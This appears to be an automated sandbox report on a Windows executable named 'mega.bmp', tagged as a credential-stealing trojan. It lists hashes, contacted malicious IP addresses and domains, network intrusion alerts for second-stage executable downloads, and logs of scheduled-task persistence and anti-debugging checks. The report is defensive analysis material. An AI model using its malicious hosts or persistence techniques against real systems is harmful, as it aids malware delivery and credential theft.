Summary | ZeroBOX

mega.bmp

Tags: Trojan_PWS_Stealer, Gen1, AgentTesla, Emotet, Generic Malware, Credential, info stealer, User Data, browser, UPX, Chrome, Malicious Library, Malicious Packer, Google, SQLite, Cookie, Create Service, DGA, Socket, DNS, PWS, Sniff Audio, BitCoin
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 7, 2021, 4:39 p.m. Oct. 7, 2021, 4:41 p.m.
Size 385.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 477b1b2a2779f1a1d6e7ff42a5eb9772
SHA256 aa4efc2c7b8e21dc0ad4f2557f81768b4cf7fc05f7a0a65b22776c4e4e12454f
CRC32 0946F99C
ssdeep 12288:0ZK3R+sfOwtpl5othMsUmE0IKuPK6B3OXF/Bi:0Q3Rppl5ahe0qB3OZk
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library

IP Address Status Action
103.155.92.58 Active Moloch
103.155.93.196 Active Moloch
104.244.42.1 Active Moloch
111.90.146.149 Active Moloch
144.202.76.47 Active Moloch
149.154.167.99 Active Moloch
162.0.210.44 Active Moloch
162.0.214.42 Active Moloch
162.159.135.233 Active Moloch
164.124.101.2 Active Moloch
172.67.176.198 Active Moloch
186.2.171.3 Active Moloch
188.225.87.175 Active Moloch
194.145.227.159 Active Moloch
2.56.59.42 Active Moloch
34.117.59.81 Active Moloch
37.0.8.119 Active Moloch
37.140.192.230 Active Moloch
45.133.1.107 Active Moloch
45.133.1.182 Active Moloch
52.216.26.67 Active Moloch
52.95.170.52 Active Moloch
77.88.55.60 Active Moloch
88.99.66.31 Active Moloch
92.61.46.213 Active Moloch
94.142.140.35 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 149.154.167.99:443 -> 192.168.56.101:49199 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 77.88.55.60:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49198 -> 149.154.167.99:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49202 -> 104.244.42.1:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49211 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49209 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49208 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49208 -> 34.117.59.81:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 34.117.59.81:443 -> 192.168.56.101:49208 2025330 ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49210 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49219 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49219 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49223 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49237 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49234 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49238 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49235 -> 172.67.176.198:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49235 -> 172.67.176.198:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49243 -> 172.67.176.198:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.67.176.198:80 -> 192.168.56.101:49243 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49220 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49220 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49242 -> 94.142.140.35:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 45.133.1.107:80 -> 192.168.56.101:49226 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 45.133.1.107:80 -> 192.168.56.101:49226 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49259 -> 92.61.46.213:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49259 -> 92.61.46.213:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49245 -> 172.67.176.198:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49250 -> 172.67.176.198:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49262 -> 92.61.46.213:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49221 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49225 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49231 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49231 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49225 -> 34.117.59.81:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.117.59.81:443 -> 192.168.56.101:49225 2025330 ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) Device Retrieving External IP Address Detected
TCP 192.168.56.101:49233 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49233 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:62902 -> 164.124.101.2:53 2016778 ET DNS Query to a *.pw domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.101:49239 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49232 -> 162.159.135.233:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49232 -> 162.159.135.233:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49241 -> 162.159.135.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49268 -> 92.61.46.213:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49246 -> 111.90.146.149:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 192.168.56.101:49246 -> 111.90.146.149:80 2016777 ET INFO HTTP Request to a *.pw domain Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 111.90.146.149:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 192.168.56.101:49246 -> 111.90.146.149:80 2016777 ET INFO HTTP Request to a *.pw domain Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 92.61.46.213:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.101:49254 -> 92.61.46.213:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 111.90.146.149:80 -> 192.168.56.101:49246 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 103.155.93.196:80 -> 192.168.56.101:49244 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49253 -> 94.142.140.35:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 94.142.140.35:80 -> 192.168.56.101:49253 2014819 ET INFO Packed Executable Download Misc activity
TCP 94.142.140.35:80 -> 192.168.56.101:49253 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49280 -> 144.202.76.47:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 194.145.227.159:80 -> 192.168.56.101:49230 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.145.227.159:80 -> 192.168.56.101:49230 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 194.145.227.159:80 -> 192.168.56.101:49230 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 37.140.192.230:80 -> 192.168.56.101:49249 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49286 -> 88.99.66.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49248 -> 52.95.170.52:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49272 -> 92.61.46.213:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 92.61.46.213:443 -> 192.168.56.101:49273 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
UDP 192.168.56.101:55667 -> 164.124.101.2:53 2023883 ET DNS Query to a *.top domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.101:49311 -> 52.95.170.52:80 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49315 -> 188.225.87.175:80 2023882 ET INFO HTTP Request to a *.top domain Potentially Bad Traffic
TCP 192.168.56.101:49356 -> 52.95.170.52:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 162.0.214.42:80 -> 192.168.56.101:49359 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49363 -> 88.99.66.31:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49361 -> 162.0.210.44:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 162.0.214.42:80 -> 192.168.56.101:49365 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 162.0.214.42:80 -> 192.168.56.101:49365 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 162.0.214.42:80 -> 192.168.56.101:49365 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint

TLSv1 192.168.56.101:49204 -> 77.88.55.60:443
issuer: C=RU, O=Yandex LLC, OU=Yandex Certification Authority, CN=Yandex CA
subject: C=RU, L=Moscow, OU=ITO, O=Yandex LLC, CN=*.yandex.az
fingerprint: 2b:13:52:0c:b0:c6:8c:c9:e3:05:6e:11:91:74:4d:65:ce:3a:64:29

TLSv1 192.168.56.101:49208 -> 34.117.59.81:443
issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1D4
subject: CN=ipinfo.io
fingerprint: 9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e

TLSv1 192.168.56.101:49213 -> 162.159.135.233:443
issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
subject: C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
fingerprint: a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

TLSv1 192.168.56.101:49223 -> 162.159.135.233:443
issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
subject: C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
fingerprint: a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

TLSv1 192.168.56.101:49237 -> 162.159.135.233:443
issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2
subject: C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
fingerprint: a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

TLSv1 192.168.56.101:49250 -> 172.67.176.198:443
issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
fingerprint: f2:26:d9:07:c7:f6:18:ff:8c:b8:6c:92:e9:50:57:e4:a9:94:e5:0d

TLSv1 192.168.56.101:49225 -> 34.117.59.81:443
issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1D4
subject: CN=ipinfo.io
fingerprint: 9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e

TLSv1 192.168.56.101:49241 -> 162.159.135.233:443
issuer: None
subject: None
fingerprint: None

TLSv1 192.168.56.101:49280 -> 144.202.76.47:443
issuer: C=CN, O=TrustAsia Technologies, Inc., OU=Domain Validated SSL, CN=TrustAsia TLS RSA CA
subject: CN=listincode.com
fingerprint: 84:23:95:42:66:09:11:39:0d:e6:22:7f:eb:b3:cc:79:dd:fa:36:ed

TLSv1 192.168.56.101:49286 -> 88.99.66.31:443
issuer: C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA
subject: CN=*.iplogger.org
fingerprint: 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb

TLSv1 192.168.56.101:49356 -> 52.95.170.52:443
issuer: C=US, O=Amazon, OU=Server CA 1B, CN=Amazon
subject: CN=*.s3.eu-north-1.amazonaws.com
fingerprint: b3:55:b1:8b:e1:54:cd:a4:5a:94:dc:0f:a1:9a:da:9d:74:3e:22:d7

TLSv1 192.168.56.101:49361 -> 162.0.210.44:443
issuer: C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com
subject: C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com
fingerprint: 68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf

TLSv1 192.168.56.101:49363 -> 88.99.66.31:443
issuer: C=US, O=Let's Encrypt, CN=R3
subject: CN=iplogger.com
fingerprint: 01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "PowerControl HR" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "PowerControl LG" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: SUCCESS!
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\RarSFX0>
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: taskkill
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: /f -Im "L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The process "L_0PQ1nH1s1hf_DH8W5V8AUl.exe" with PID 2744 has been terminated.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The file cannot be copied onto itself.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 0 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: XAJ5SctM.IMN
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: E1N4OJ2.aUX
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: KPeo.Pvp
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: _OTV19C.~
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: EcF9W5.VNQ
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: pm9uz.pF
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: KO6pQ1.bhw
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 1 file(s) copied.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR: The process "chrome.exe" not found.
console_handle: 0x0000000b
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\Locales\ko.pak
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb1290
0x3bb15cd
0x3bc8929
0x3bf9194
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12051012
registers.edi: 0
registers.eax: 0
registers.ebp: 12051052
registers.edx: 32
registers.ebx: 12051356
registers.esi: 0
registers.ecx: 3690184
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb129e
0x3bb15cd
0x3bc8929
0x3bf9194
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12051012
registers.edi: 0
registers.eax: 0
registers.ebp: 12051052
registers.edx: 32
registers.ebx: 12051356
registers.esi: 0
registers.ecx: 3690184
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb1290
0x3bb15cd
0x3bc8929
0x3bc9811
0x3bf1d05
0x3bf29dd
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12045268
registers.edi: 0
registers.eax: 0
registers.ebp: 12045308
registers.edx: 32
registers.ebx: 12045612
registers.esi: 0
registers.ecx: 3690024
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb129e
0x3bb15cd
0x3bc8929
0x3bc9811
0x3bf1d05
0x3bf29dd
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12045268
registers.edi: 0
registers.eax: 0
registers.ebp: 12045308
registers.edx: 32
registers.ebx: 12045612
registers.esi: 0
registers.ecx: 3690024
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb1290
0x3bb15cd
0x3bc8929
0x3bc9075
0x3bf2b4f
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12045684
registers.edi: 0
registers.eax: 0
registers.ebp: 12045724
registers.edx: 32
registers.ebx: 12046028
registers.esi: 0
registers.ecx: 3273616
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb129e
0x3bb15cd
0x3bc8929
0x3bc9075
0x3bf2b4f
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2
exception.address: 0x72a734b2
registers.esp: 12045684
registers.edi: 0
registers.eax: 0
registers.ebp: 12045724
registers.edx: 32
registers.ebx: 12046028
registers.esi: 0
registers.ecx: 3273616
1 0 0

__exception__

stacktrace:
CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x72a74f99
0x3c3569d
0x3c3574a
0x3c357b8
0x3bb0a09
0x3bb1cba
0x3bb1290
0x3bb15cd
0x3bc8929
0x3bedd51
0x3bf7154
0x3bf936b
0x3bf958b
0x3c58522
0x3c58605
u7bmz_jch5qwyeh3mrgkn8v4+0x3c89 @ 0x13d3c89
u7bmz_jch5qwyeh3mrgkn8v4+0xd703 @ 0x13dd703
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44
exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111
exception.exception_code: 0xc0000005
